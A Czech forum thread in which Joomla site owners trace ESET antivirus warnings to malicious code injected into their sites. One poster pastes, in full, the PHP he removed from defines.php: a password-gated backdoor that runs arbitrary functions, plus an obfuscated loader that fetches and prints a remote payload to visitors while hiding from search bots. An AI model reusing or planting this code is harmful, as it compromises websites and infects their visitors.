VIRY.CZ

Pomáháme v boji s počítačovou havěti!
https://forum.viry.cz:443/

ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

https://forum.viry.cz:443/viewtopic.php?t=147290

Stránka 1 z 2

ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 12:04
od Ipanema
Dobrý den, ahoj,

nepoužívám Antivirus ESET NOD32, ale mám problém u konkrétních webů při přístupu na ně. Přístup je vždy zablokován a web prý obsahuje hrozbu: "JS/Kryptik.AYR trojský kůň".
Na svém PC problém nemám (a to jen pro to, že nepoužívám zmíněný antivir, jinak mám také WIN7 a MSIE také), ale mám tuto informaci od majitelů webů, kteří na svoje stránky chtějí přistoupit. Pokud mají na PC: X) WIN 7, Y) antivir NOD32 ve verzi 8 a Z) prohlížeč Internet Explorer, tak se web nezobrazí.
Pokud jednu z podmínek X, Y, Z neudělají, web jede normálně. Čili třeba prohlížeč Chrome, Edge, WIN10, jiný antivir, ...

Kontaktoval jsem webhosting. Technické odd. vč. hlavního programátora vše prověřili, žádný ze souborů v databází a na kompletním FTP neobsahuje vir/trojského koně.
Kontaktoval jsem technické odd. spol ESET, jestli mi to můžou prověřit, zda není učiněna nějaká online blokace u nich. Odpověď byla, že vyzkoušeli "...kde je nainstalovaný ESET NOD32 Antivirus 9 a také na stroji, kde je nainstalovaná firemní verze ESET Endpoint Security 6. Ani v jedném případě nedochází k blokování stránek.". Při mojí odpovědi, že je blokace pouze (pravděpodobně) jen u uživatelů s vezí 8 jejich programu, se mi již odpovědi nedostalo. Tím pádem to zkouším zde, než začnu dělat osvětu jiným lidem, že mají upgradovat produkty spol. ESET ve svém PC na vyšší verzi.

Nemám žádný log a pochybuji, že mi ho někdo bude přes půl republiky dělat. Chyba je odsledovaná u třech různých lidí, ve třech různých koutech ČR, jistě i s jinou konfigurací OS Windows a jinou IP adresou.

Pokud by byl zde někdo od té dobroty a vyzkoušel to také a případně odhalil kde se skrývá chyba, budu opravdu rád.

Weby:

Kód: Vybrat vše

www.ipanema.cz + www.nordcoursing.cz + www.ajajidelna.cz + www.5e.cz/veterina

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:16
od mskarka
Mám stejný problém na svém webu, který běží pod joomlou 3.1.5
Problém se objevil dnes okolo jedné hodiny. Zatím všechny snahy žádný vadný soubor neobjevily. problém se objevuje pouze pod IE s Eset, Chrome i FireFox s Eset trojana nezaregistrují.
Eset Endpoint Security verze 6.2.2033.1

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:34
od Ipanema
O jaký web se jedná? Klidně sem nebo do SZ. Napíšu to do ESETu.
Podle mě v Joomle to nebude. Mám na Joomle weby s verzí 2,5 i 3,4 a některý se chová tak a jiný jinak....

Díky.

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:37
od mskarka
No snažil jsem se tu přijít jak se tu posílají SZ, nepřišel :) Tak píšu takto

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:39
od Ipanema
Vidím :shock: Stejná vlastnost jako u mých webů.
Odesílám Vaši adresu nyní do ESETu, ať se s tím poperou u profesionálů.

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:41
od mskarka
A jen tak pro zajímavost, Vaše weby beží pod joomlou?
Já měl totiž strach aby to nesouviselo s tímhle. Zrovna dneska jsem chtěl updatovat :D

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:43
od Ipanema
Pokud to s tím souvisí, nejede polovina webů světa? :shock:
Vyzkouším update na 3.4.6 na jednom z webů a napíšu jestli se něco změnilo.

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:49
od Ipanema
Ne, prý to nepomohlo.
Joomla aktualizována na jednom z webů, v PC proběhl Ccleaner, restart a otevření MSIE. Bez jakékoliv známky určující jiný stav :(

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:51
od mskarka
Tak budeme muset asi zatlačit na ESET a počkat co nám k tomu řekne :-/

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:54
od Ipanema
Jak příjde nějaká odpověď, můžu sem napsat poznatek. Zatím to ale vypadá, že řeší důležitější věci a odpovědi. Bez urážky.
Je ale možné, že musím být vlastníkem licence, aby mi odpověděli víc než "zkusili jsme to a u nás to jede na devítkové verzi antiviru OK".

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:55
od mskarka
My máme ve firmě ESETy nakoupené, takže jsem taky zadal dotaz a uvidíme jak se nám budou věnovat :)

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 14:57
od Ipanema
Už je zde...
Dobrý den,

webové stránky jsem testovala na stanicích s programy ESET Smart Security 8 a ESET NOD32 Antivirus 8. V obou případech došlo k blokaci. Na stanicích s ESET Smart Security 9, ESET NOD32 Antivirus 9 a ESET Endpoint Security 6 k blokování nedošlo. Vše jsem předala kolegům do virové laboratoře na Slovensku. Prosím o strpení. Řeší nyní mnoho případů, takže zatím k tomu Vašemu nemám bližší informace. Jakmile je získám, budu Vás kontaktovat.
Děkuji za pochopení.

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 15:04
od mskarka
Tak.. hned jsem klidnější :D Určitě i naši zákazníci až je to potká

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 15:52
od mskarka
Tak já jsem svůj trojský vir vyřešil... Ehm Ehm...
Absolutně to ale nesouviselo s řešením viru. Ještě se mi a webu zobrazovala další chyba (viz tento obrázek). Tudíž jsem se pustil do její řešení. Zjistil jsem že umazáním mezery na konci ve 3 souborech (configuration.php, seassion.php a defines.php) vyřešilo zobrazování chyby a vyřešení chyby vyřešilo trojského koně :)

Jsem z toho jelen.

Re: ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

Napsal: 21 pro 2015 18:20
od Ipanema
Zkusil jsem to u jednoho webu. Asi to sem už nepatří, ale napíšu to, pro další....
V souboru configuration.php a seassion.php žádnou mezeru na konci nemám. V souboru defines.php jsem umazal "za tvým posledním středníkem" (od něho až do konce) ze screenu toto:

Kód: Vybrat vše

//istartn

function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

function request_url_data($url) {

    if(!is_valid_url($url))
        return false;

    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}
error_reporting(0);
$_passssword = 'b01692be46d146416762ae0ed788ff77';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');




if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
    echo(substr($tmp, 50));
    echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}

$cookie_name = '_PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
//    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
//        $url = base64_decode('a3d3czksLDszLTIwMy00NS0xMjEsYW9sZCw8d2xubnoldnduXHBsdnFgZj4xNDc0NjkwNTIwMTc5NjU2');
    $url = decrypt_url('a3d3czksLDszLTIwMy00NS0xMjEsYW9sZCw8d2xubnoldnduXHBsdnFgZj4xNDc0NjkwNTIwMTc5NjU2');
    $code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iendn
A také web běží. Vyzkouším případně na dalším webu.
Poklona za obejítí problému. :thumbsup:
Uvidíme jak to půjde na dalších webech.
Všechny časy jsou v UTC+01:00
Stránka 1 z 2

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz